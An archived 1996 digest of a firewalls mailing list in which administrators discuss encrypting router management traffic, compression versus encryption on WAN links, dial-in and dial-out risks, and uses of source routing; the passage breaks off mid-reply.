From firewalls-owner Mon Jan 1 11:22:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26434 for firewalls-outgoing; Mon, 1 Jan 1996 11:13:40 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26428 for ; Mon, 1 Jan 1996 11:13:23 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA25136; Mon, 1 Jan 96 13:14:01 CST Received: by mnbp.network.com with Microsoft Mail id <30E831CE@mnbp.network.com>; Mon, 01 Jan 96 13:11:10 CST From: Craig McLellan To: firewalls , pietro Subject: Re: Security managing Cisco Routers Date: Mon, 01 Jan 96 13:10:00 CST Message-Id: <30E831CE@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You could you Network Systems borderguard access router placed behind the Cisco's and nail up an encrypted "sleeve" for all management traffic. This would pass through the public network to the remote borderguard then be decrypted and forwarded to the Cisco you wish to manage. Cost is just over $2K US. RGRDS....clm | My actual problem is to managed several Cisco Routers situated | on a public network from a central site, from where there is no | way to garantee secure communication. | | I can access them using telnet or by using the CiscoWorks | application (protocols SNMP and TFTP), but still the password | and the operation are running on the network in a clear form. | | In many actual security configuration routers are the elements | that protect the internal network. Are there any techniques or | software to protect them and administrative communications with | them? You might be able to get an encrypted connection to a network each Cisco is attached to, and then use one of the other authentication methods commented on (Kerberos, Tacas, or Radius), or simply have a shorter path to worry about sniffing. If you bridge off a cheap bastion system running SSH or DESlogin, then you have an encrypted connection to that box, and a bridged connection to the router. (You might also connect this box to a serial port on the router.) This would take roughly one 386 running UNIX, and possibly one bridge per site. Depending on availability of those resources, you could so something like: external net | router 386/UNIX internal | | network--[bridge]--+---------+- -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Jan 2 00:22:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA09784 for firewalls-outgoing; Tue, 2 Jan 1996 00:10:17 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id AAA09779 for ; Tue, 2 Jan 1996 00:10:10 -0800 (PST) Received: from lordmuck.itd.uts.edu.au (matt@lordmuck.itd.uts.EDU.AU [138.25.32.20]) by solarnum.itd.uts.edu.au (8.7.1/8.7.1/uts) with ESMTP id QAA12397; Fri, 8 Dec 1995 16:47:49 +1100 (EST) Received: (from matt@localhost) by lordmuck.itd.uts.edu.au (8.7.1/8.7/Jas) id QAA03786; Fri, 8 Dec 1995 16:52:18 +1100 (EST) From: Jas (Matthew K) Message-Id: <199512080552.QAA03786@lordmuck.itd.uts.edu.au> Subject: Re: Type enforcement vs chroot and buffers To: mrm@alpharel.com (Mike Murphy) Date: Fri, 8 Dec 1995 16:52:18 +1100 (EST) Cc: firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199512072351.PAA24540@visalia.optigfx.com> from "Mike Murphy" at Dec 7, 95 03:51:25 pm X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mike Murphy wrote this... [...] > and followed, chroot works. A lot of "if's", sad to say. And too > bad sockets weren't in filespace. [...] well in SVR4 sockets are in the filespace (via /dev/tcp, /dev/udp, and libsocket) Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Systems Programmer Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike From firewalls-owner Tue Jan 2 05:07:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA17328 for firewalls-outgoing; Tue, 2 Jan 1996 04:55:11 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA17323 for ; Tue, 2 Jan 1996 04:55:07 -0800 (PST) From: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Received: from alau.al.mt.np.els-gms.att.net by relay2.UU.NET with SMTP id QQzwtv13303; Tue, 2 Jan 1996 07:54:22 -0500 (EST) Received: from mhs!pfg1 by /C=US/AD=ATTMAIL;Tue Jan 2 12:54:05 -0000 1996 Received: by /C=us/AD=attmail/PD=pfg1;Tue Jan 2 06:50:35 -0600 1996 Date: Tue, 02 Jan 1996 06:50:35 -0600 Transport-Options: /STANDARD/REPORT Original-Encoding-Types: ASCII Disclose-Recipients: yes Subject: Firewalls needed for both dial-in AND dial-out P2-Originator: mhs!pfg1/G=BECKY/S=HEROLD To: firewalls@GreatCircle.com, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm putting together a document listing the risks of not only allowing dial-in access to a networked PC (used for accessing computer systems on a corporate WAN/LAN at least some of the time...typically has a network interface card); but also the risks of allowing dial-out access from a networked PC. I'd appreciate your help, wisdom, and knowledge in critiquing the following regarding the dial-out issues. I apologize if there is a FAQ on this somewhere...I currently do not have very convenient access to the Internet except via e-mail. If you could provide the location of such a FAQ, that'd be great! First, here are some givens: * I know any type of remote access is NOT risk-free...that acceptable risks must be determined to allow efficient and effective use of remote access (please no long philisophical discussions of how we can never remove all risks from remote access). * I know policies need to be established for end-users to follow to help ensure remote access security. (This document will be used to establish buy-in for the policies and educate end-users why the policies are necessary.) * The environment: Large nation-wide WAN composed of several hundred LANs and running virtually every type of operating system imaginable. 18,000+ users. * With so many users, it's unlikely that all (or even a large percentage) of them will set up the dial-out access to be STRICTLY dial-out, will keep the modem shut off when not in use (if their modem set-up even allows this), or will know AND UNDERSTAND the risks involved when connecting using TCP/IP. * Users may need to dial-out to not only the Internet, but also to a vendor or customer, to a BBS, or to services such as Lexus/Nexus, CompuServ, AOL, etc. * Dial-in access to networked PCs is being controlled through firewalls. (Would like to see dial-out occur through firewalls also.) So, what are the risks involved with various dial-out methods? * Networked PC with modem using SLIP/PPP - Provides bi-directional access - Unauthorized folks (let's call them intruders!) can enter the WAN during the employee's dial-out session - Once the intruder enters the WAN he/she can wander around the systems trying to find weaknesses and other entry points - Files can be transferred to the dial-out employee's hard-drive - Files on the dial-out employee's hard-drive may also be copied, deleted, and possibly modified - Files may also be copied to, deleted, or modified on the other WAN systems - Viruses and/or trojan horses may be placed on the dial-out employee's hard drive, or on one of the systems on the WAN - Changes may be made to WAN systems which could prevent access to the WAN by legitimate WAN users * Networked PC using communications software (eg., SmallTalk) with no TCP/IP - Less risks than PPP/SLIP because of the configurability of the communications software to allow only dial-out (IF the employee remembers to configure the software this way) - What would the risks be here??? * Networked PC using a dial-out modem bank (no modem attached to the PC) - More secure because of centralized control - What would the risks be here??? * Stand-alone (never networked) PC using SLIP/PPP - Viruses and trojans can be placed on the dial-out employee's hard drive - Any files copied to diskettes and placed on the network could cause problems - Employee's PC could be used as a repository * Stand-alone PC using communications software and no TCP/IP - Again, less risks because of the communications software - What would the risks be here??? Please comment on items I have listed that you believe are NOT risks. Also, please let me know the risks for each type of dial-out PC that I did not have listed. Do you know of other dial-out methods I did not list? If so, what are they, and what are the associated risks? Thanks in advance for your help!! Becky herold.becky@mhs-pfg1.attmail.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The opinions expressed here are strictly my own and do not necessarily represent those of my employer. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Tue Jan 2 05:37:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18008 for firewalls-outgoing; Tue, 2 Jan 1996 05:26:41 -0800 (PST) Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA17999 for ; Tue, 2 Jan 1996 05:26:35 -0800 (PST) Received: from rssi.com by relay7.UU.NET with SMTP id QQzwtx08893; Tue, 2 Jan 1996 08:25:49 -0500 (EST) Received: from mel.rssi.com by rssi.com (SMI-8.6/SMI-SVR4) id IAA24805; Tue, 2 Jan 1996 08:25:25 -0500 Received: by mel.rssi.com (5.x/SMI-SVR4) id AA03193; Tue, 2 Jan 1996 08:21:36 -0500 Date: Tue, 2 Jan 1996 08:21:36 -0500 From: Brad VanOrden Message-Id: <9601021321.AA03193@mel.rssi.com> To: ckostick@ashton.csc.com, anton@the-wire.com, firewalls@greatcircle.com Subject: Re: Compression is useful (was Re: WAN Encryption) Cc: bvvanor@rssi.rssi.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I just wanted to clarify a couple points I was trying to make in my question. First, I am consulting with a Federal Government body who is placing the main computer used by several hundred users a couple hundred miles away from all the users. Their main objective in the WAN design I am doing for them is to minimize the cost of the WAN (moving the computer to where the users are has already been eliminated). In fact, they have never mentioned security as a concern of theirs. Being concerned about security, I did not want to present them a plan that did not also include some security considerations. Some of the Government people came up with the idea of using a compression box to reduce the number of required T1s. The box they recommended has V.35 ports, and would sit between the Cisco and the CSU/DSU. To be fair, the vendor told me his box did not do encryption, but since the data was compressed, it would not be in plain view. I was also looking at an encryption box from WANG. It has AUI ports and would therefore have to go before the CISCO. Thus, my dilema. If I encrypt before I compress, there won't be much to compress. I am not an encryption expert. I was trying to get a general feel from the list of the level of difficulty someone would have reading the data if it was only compressed. I think the consensus has been: It will keep the honest person honest, but will not deter a determined hacker. If someone nows of a device that does encryption as well as compression, I would greatly like to hear it. Thank You, Brad Van Orden Rapid Systems Solutions, Inc www.rssi.com 410-312-0777 >It began with Brad VanOrden asking: >>> >>> I have a question regarding the level of protection I can expect from >>> compressing traffic before it hits a WAN. That is, the compression >>> box vendor stated that since the data is compressed, that unless a snooper >>> has the compression key, the data is also essentially encrypted. >>> >>> Do you feel the "compression" encyrption is good enough, or should I look >>> for a better encryption method? > >Then Chris Kostick said: > >>First of all, compression encryption (even in quotes) is not really a good >>way of stating it. Nonetheless, I'd say no to this. Simply because if >>someone has the tools and/or utilities to sniff something off of a network, >>then the chances are really good that the tool already knows how to >>uncompress the data stream and read everything. If you want privacy, use >>encryption. > >However I'd like to qualify things on two counts. > >Do use compression, please. At the very least it will reduce the >recurrent patterns in your data stream so that even if you are only >using weak encryption the BFI decrypter will not be using this advantage. >This isn't to say you shouldn't use strong encryption, but there may >be constraints you are working under. > >A dictionary based compression algorithm can present problems >to a receiver who doesn't have the dictionary. Strictly speaking, >this is a 'coding' scheme. People often confuse 'codes' and 'cyphers'. >Its not a bullet-prof way of protecting your data but it will deter, >for example, an automatic sniffer looking for the the login-password >sequence. But then so will XORing your packets with the first chapter >of DuMaurier's "Rebecca" (As in "The Key to Rebecca"). > >I view compression like I view The Club. It will deter the casual >theft. Realistically, you have to do what I was suggesting in an >earlier thread (cf the archives) and balance the investment in >protection against the cost and liability of a loss. In short, stop >thinking like a {programmer,consultant,administrator..} for a moment >and think like an actuary. > >Brad, I presume you are going in to this as a "consultant". Present >to your client the comparable costs of the different solutions. >Involve their accountant and lawyers to get input about risk >and liability. Find out if their insurance covers data loss. > > >Please, please, please, recognise the difference between >compression and encryption at the LINK level and at the >NETWORK level. Make sure you use the one appropriate >for your situation. > >/anton From firewalls-owner Tue Jan 2 05:52:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18711 for firewalls-outgoing; Tue, 2 Jan 1996 05:44:18 -0800 (PST) Received: from hvar.mzt.hr (hvar.mzt.hr [161.53.4.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA18667 for ; Tue, 2 Jan 1996 05:41:55 -0800 (PST) Received: from gaus@localhost by hvar.mzt.hr (8.7/8.6.12.CI) id OAA02554; Tue, 2 Jan 1996 14:38:26 +0100 (MET) From: gaus@znanost.hr (Damir Rajnovic) Message-Id: <199601021338.OAA02554@hvar.mzt.hr> Subject: Where to find Endorsed Product List To: Firewalls@GreatCircle.COM Date: Tue, 2 Jan 1996 14:38:26 +0100 (MET) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello there! Can someone tell me where to find Endorsed Product List on the Net? I need it for a seminar. Thank's in advance. Gaus |-----------------------------------------------------------------| | Damir Rajnovic | E-mail: gaus@znanost.hr | | Ministry of Science and Technology | Voice: (+385 1)4594 437 | | Strossmayerov trg 4, 41000 Zagreb | | |-----------------------------------------------------------------| | There is no unsolvable problems, but question is - can you | | accept solution. | |=================================================================| From firewalls-owner Tue Jan 2 06:07:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18666 for firewalls-outgoing; Tue, 2 Jan 1996 05:40:58 -0800 (PST) Received: from simtel.Coast.NET (simtel.coast.net [205.149.128.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA18661 for ; Tue, 2 Jan 1996 05:40:51 -0800 (PST) Received: by simtel.Coast.NET (Smail3.1.28.1 #12) id m0tX6wd-0000sKC; Tue, 2 Jan 96 08:40 EST Date: Tue, 2 Jan 1996 08:40:03 -0500 (EST) To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Cc: firewalls@greatcircle.com (Firewalls Mailing List) Subject: Re: Firewalls needed for both dial-in AND dial-out In-Reply-To: from "/G=BECKY/S=HEROLD@mhs-pfg1.attmail.com" at Jan 2, 96 06:50:35 am From: "Mike O'Connor" Reply-To: "Mike O'Connor" X-Organization: :noitazinagrO-X Message-Id: <960102084003.mjo@dojo> Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk :So, what are the risks involved with various dial-out methods? :* Networked PC with modem using SLIP/PPP : - Provides bi-directional access : - Unauthorized folks (let's call them intruders!) can enter the WAN during : the employee's dial-out session : - Once the intruder enters the WAN he/she can wander around the systems : trying to find weaknesses and other entry points : - Files can be transferred to the dial-out employee's hard-drive : - Files on the dial-out employee's hard-drive may also be copied, deleted, : and possibly modified : - Files may also be copied to, deleted, or modified on the other WAN : systems : - Viruses and/or trojan horses may be placed on the dial-out employee's : hard drive, or on one of the systems on the WAN : - Changes may be made to WAN systems which could prevent access to the WAN : by legitimate WAN users One big danger: Networked PCs may be screwed up by the mixing and matching of IP stacks and clients that this sort of thing implies. Just as one example, one incarnation of C$'s software unobviously munged with WINSOCK.DLL, which caused me lots of grief trying to debug why a system wasn't working properly. The supportability of allowing people to do this needs to be considered. ...Mike -- Michael J. O'Connor Internet: mjo@dojo.mi.org InterNIC WHOIS: MJO http://www.coast.net/~mjo "Sir, I must protest! I am not a merry man!" -Worf From firewalls-owner Tue Jan 2 07:22:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22165 for firewalls-outgoing; Tue, 2 Jan 1996 07:19:41 -0800 (PST) Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA22160 for ; Tue, 2 Jan 1996 07:19:38 -0800 (PST) Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id JAA21893 for GreatCircle.COM!firewalls; Tue, 2 Jan 1996 09:11:19 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA13022; 2 Jan 96 09:40:12 CST (Tue) Received: by sonic.nmti.com; id AA27928; Tue, 2 Jan 1996 09:11:15 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601021511.AA27928@sonic.nmti.com.nmti.com> Subject: Re: Type enforcement vs chroot and buffers To: matt@lordmuck.itd.uts.edu.au (Jas) Date: Tue, 2 Jan 1996 09:11:15 -0600 (CST) Cc: mrm@alpharel.com, firewalls@GreatCircle.COM, smith@sctc.com In-Reply-To: <199512080552.QAA03786@lordmuck.itd.uts.edu.au> from "Jas" at Dec 8, 95 04:52:18 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > and followed, chroot works. A lot of "if's", sad to say. And too > > bad sockets weren't in filespace. > well in SVR4 sockets are in the filespace (via /dev/tcp, /dev/udp, and > libsocket) That's not significantly better in terms of security, since it's all or nothing. To be any use it'd have to be something like "/dev/tcp/25" and so on... From firewalls-owner Tue Jan 2 09:11:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA24120 for firewalls-outgoing; Tue, 2 Jan 1996 09:00:19 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA24113 for ; Tue, 2 Jan 1996 09:00:14 -0800 (PST) Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id QAA31145 for ; Tue, 2 Jan 1996 16:59:32 GMT Received: from async61.async.duke.edu(152.3.249.61) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaIp8CkR; Tue Jan 2 16:59:29 1996 Received: by async61.async.duke.edu with Microsoft Mail id <01BAD90A.16831660@async61.async.duke.edu>; Tue, 2 Jan 1996 12:01:45 -0500 Message-ID: <01BAD90A.16831660@async61.async.duke.edu> From: Ray Hooker To: "'Firewall Mailing List'" Subject: Source Routing and Disabling Date: Tue, 2 Jan 1996 12:01:32 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know certain things about source routing: - Stated purpose (see RFC 791) was to allow the specification of = routing information to be used by gateways. - I know how to code source routed packets under UNIX (or Linux). - They can be used in attacking TCP/IP hosts (see IPEXT paper on weaknesses in the TCP/IP protocol. - Microsoft's tracert module purportedly has an option to use=20 loose source-routing to debug network problems (this is their version of traceroute). - Some networks configure their routers to reject source-routed = packets. - Firewalls should reject source-routed packets. What I am curious about is what functions or applications, if any, = commonly use source-routing. I haven't noticed any Telnet clients that, = for example, could specify a loose source-routing to contact a = particular host. I have searched the Comer series on Internetworking = with TCP/IP and other references, but see little information on actual = usage. Ray Hooker, rayhook@ibm.net Secure I/T Inc. 1-919-544-4565 From firewalls-owner Tue Jan 2 09:52:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA25576 for firewalls-outgoing; Tue, 2 Jan 1996 09:46:52 -0800 (PST) Received: from warp10.smartlink.net (smartlink.net [204.118.4.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA25571 for ; Tue, 2 Jan 1996 09:46:45 -0800 (PST) Received: by warp10.smartlink.net(8.6.12/SMARTLINK-1.0) with id JAA06359 for on Tue, 2 Jan 1996 09:47:21 -0800 Date: Tue, 2 Jan 1996 09:47:20 -0800 (PST) From: Pablo To: firewalls@greatcircle.com Subject: ipx-bridging & ip-routing Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, I am working on a problem in which I need some sort of unix box ( linux/bsd ? ) to do ip-routing ( no problem there, i know ), & do ipx-bridging. The second part is the problem area. Coming into & going out of the box will be 100 mbps FDDI. I have set up a linux box and put ipfwadmin & ipxbridge & ipxripd ( mostly from sunsite ) on it, and it seems like it will work ok for ipx bridging, but it seems like it will be far to ineffecient to handle traffic from 300+ users @ 100mbps. vinod@cse.iitb.ernet.in says in the documentation on ipx-bridge that he is currently using ipx-bridge to connect two networks, i'm not sure how large the networks are. I was hoping someone out there would have some comments or ideas on what to use to ROUTE ip packets with good control, and bridge ipx-packets as fast as possible. I can use a dedicated box for the routing, or even one of the cisco products if need be, I just need to know the best way to go. Any insight would be greatly appreciated. Thanks in advance! paul From firewalls-owner Tue Jan 2 10:22:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA26387 for firewalls-outgoing; Tue, 2 Jan 1996 10:09:41 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA26382 for ; Tue, 2 Jan 1996 10:09:37 -0800 (PST) Received: from pferguso-pc.cisco.com (c4robo4.cisco.com [171.68.13.74]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id KAA22829; Tue, 2 Jan 1996 10:07:55 -0800 Message-Id: <199601021807.KAA22829@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jan 1996 13:08:22 -0500 To: Ray Hooker From: Paul Ferguson Subject: Re: Source Routing and Disabling Cc: "'Firewall Mailing List'" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A common application for loose source-routing, used mainly by service providers, is troubleshooting routing problems in the Internet. It can be quite helpful to trace a route *from* a specified node, *to* a specified node. Of course, this doesn't mean that you should allow loose source-routed traffic into your internal network from external sources, however, many service providers allow source-routed traffic transit on their backbones for specifically this purpose. - paul At 12:01 PM 1/2/96 -0500, Ray Hooker wrote: >I know certain things about source routing: > - Stated purpose (see RFC 791) was to allow the specification of routing > information to be used by gateways. > - I know how to code source routed packets under UNIX (or Linux). > - They can be used in attacking TCP/IP hosts (see IPEXT paper on > weaknesses in the TCP/IP protocol. > - Microsoft's tracert module purportedly has an option to use > loose source-routing to debug network problems (this is their > version of traceroute). > - Some networks configure their routers to reject source-routed packets. > - Firewalls should reject source-routed packets. >What I am curious about is what functions or applications, if any, commonly use source-routing. I haven't noticed any Telnet clients that, for example, could specify a loose source-routing to contact a particular host. I have searched the Comer series on Internetworking with TCP/IP and other references, but see little information on actual usage. > >Ray Hooker, rayhook@ibm.net >Secure I/T Inc. >1-919-544-4565 > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Tue Jan 2 11:07:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28566 for firewalls-outgoing; Tue, 2 Jan 1996 11:03:42 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28554 for ; Tue, 2 Jan 1996 11:03:38 -0800 (PST) Date: Tue, 2 Jan 1996 14:02:49 -0500 (EST) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com CC: bvvanor@rssi.rssi.com Message-Id: <960102140249.202006bf@hobbes.orl.mmc.com> Subject: Compression is useful - but for security, not Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Being concerned about security, I did not want to present them a plan that >did not also include some security considerations. Some of the Government >people came up with the idea of using a compression box to reduce the number >of required T1s. The box they recommended has V.35 ports, and would sit >between the Cisco and the CSU/DSU. To be fair, the vendor told me his >box did not do encryption, but since the data was compressed, it would not >be in plain view. 1) Compression aids performance. It does not aid security (at best is SBO). 2) Sounds like you have dedicated lines. Have you considered requiring PNS (Protected Network Service) from the telco ? (May have a different name but should be available). With this your lines are isolated/protected from other trunks. A dedicated line is not at the same risk as the Internet and PNS is generally "good enough" for SBU (Sensitive but Unclassified) traffic. When the idea was introduced a couple of years ago, it was to be approved by the NSA and was a part of the FTS contract. Dunno where it is now. Warmly, Padgett From firewalls-owner Tue Jan 2 11:22:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA28971 for firewalls-outgoing; Tue, 2 Jan 1996 11:16:01 -0800 (PST) Received: from magellan.cleveland.dfas.mil (magellan.cleveland.dfas.mil [164.216.50.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA28966 for ; Tue, 2 Jan 1996 11:15:54 -0800 (PST) Received: from mail.cleveland.dfas.mil (mail.cleveland.dfas.mil [164.216.11.5]) by magellan.cleveland.dfas.mil (8.6.12/8.6.12) with SMTP id OAA09745 for ; Tue, 2 Jan 1996 14:11:28 -0500 Received: from cc:Mail by mail.cleveland.dfas.mil id AA820620752; Tue, 02 Jan 96 14:13:09 EST Date: Tue, 02 Jan 96 14:13:09 EST From: "KOHLS, KERSTEN" Message-Id: <9600028206.AA820620752@mail.cleveland.dfas.mil> To: firewalls@greatcircle.com Subject: FreeBSD as a firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings -- Does anyone use FreeBSD as a firewall and can you tell me what problems you've had with it? We're evaluating solutions and this is one of the possibilities . . . TIA -- Kersten Kohls kkohls@cleveland.dfas.mil From firewalls-owner Tue Jan 2 11:40:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA29132 for firewalls-outgoing; Tue, 2 Jan 1996 11:26:22 -0800 (PST) Received: from delta.eecs.nwu.edu (delta.eecs.nwu.edu [129.105.5.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA29127 for ; Tue, 2 Jan 1996 11:26:17 -0800 (PST) Received: by delta.eecs.nwu.edu (8.6.12/8.6.12) id NAA22342; Tue, 2 Jan 1996 13:22:43 -0600 Date: Tue, 2 Jan 1996 13:22:43 -0600 From: Robert Bonomi Message-Id: <199601021922.NAA22342@delta.eecs.nwu.edu> To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com, firewalls@GreatCircle.COM Subject: Re: Firewalls needed for both dial-in AND dial-out Sender: firewalls-owner@GreatCircle.COM Precedence: bulk + Date: Tue, 02 Jan 1996 06:50:35 -0600 + Subject: Firewalls needed for both dial-in AND dial-out + To: firewalls@GreatCircle.COM, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com + Sender: firewalls-owner@GreatCircle.COM + + I'm putting together a document listing the risks of not only allowing + dial-in access to a networked PC (used for accessing computer systems + on a corporate WAN/LAN at least some of the time...typically has a network + interface card); but also the risks of allowing dial-out access from a + networked PC. I'd appreciate your help, wisdom, and knowledge in critiquing + the following regarding the dial-out issues. I apologize if there is a FAQ + on this somewhere...I currently do not have very convenient access to the + Internet except via e-mail. If you could provide the location of such a FAQ, + that'd be great! + + First, here are some givens: + * I know any type of remote access is NOT risk-free...that acceptable risks + must be determined to allow efficient and effective use of remote access + (please no long philisophical discussions of how we can never remove all + risks from remote access). + * I know policies need to be established for end-users to follow to help + ensure remote access security. (This document will be used to establish + buy-in for the policies and educate end-users why the policies are + necessary.) + * The environment: Large nation-wide WAN composed of several hundred LANs + and running virtually every type of operating system imaginable. 18,000+ + users. + * With so many users, it's unlikely that all (or even a large percentage) of + them will set up the dial-out access to be STRICTLY dial-out, will keep the + modem shut off when not in use (if their modem set-up even allows this), or + will know AND UNDERSTAND the risks involved when connecting using TCP/IP. + * Users may need to dial-out to not only the Internet, but also to a vendor + or customer, to a BBS, or to services such as Lexus/Nexus, CompuServ, AOL, + etc. + * Dial-in access to networked PCs is being controlled through firewalls. + (Would like to see dial-out occur through firewalls also.) Analyzing 'dial-in' risks is fairly simple/straightforward. 1)authentication 2)authorization 3)access-control 'layered defenses' are a _good_ idea. the more you can restrict the functionality available to _any_ dial-in user, the more limited the potential risk posed by unauthorized access. strong authentication, helps ensure that *only* authorized persons gain access. + + So, what are the risks involved with various dial-out methods? + * Networked PC with modem using SLIP/PPP + - Provides bi-directional access + - Unauthorized folks (let's call them intruders!) can enter the WAN during + the employee's dial-out session + - Once the intruder enters the WAN he/she can wander around the systems + trying to find weaknesses and other entry points + - Files can be transferred to the dial-out employee's hard-drive + - Files on the dial-out employee's hard-drive may also be copied, deleted, + and possibly modified + - Files may also be copied to, deleted, or modified on the other WAN + systems + - Viruses and/or trojan horses may be placed on the dial-out employee's + hard drive, or on one of the systems on the WAN + - Changes may be made to WAN systems which could prevent access to the WAN + by legitimate WAN users all true. it *is* a 'network' connection. vulnerable to *any* attack that can be launched over a network connection. IP spoofing, session hijacking, etc. requires _at_least_ as 'good' a firewall as you would use on a hard- wired connection. the *only* difference is that it is a 'part-time' connection, but relying on this is, in effect, security through obscurity. + + * Networked PC using communications software (eg., SmallTalk) with no TCP/IP + - Less risks than PPP/SLIP because of the configurability of the + communications software to allow only dial-out (IF the employee + remembers to configure the software this way) + - What would the risks be here??? *no* vulnerability to _outside_only_ attack. Especially if the 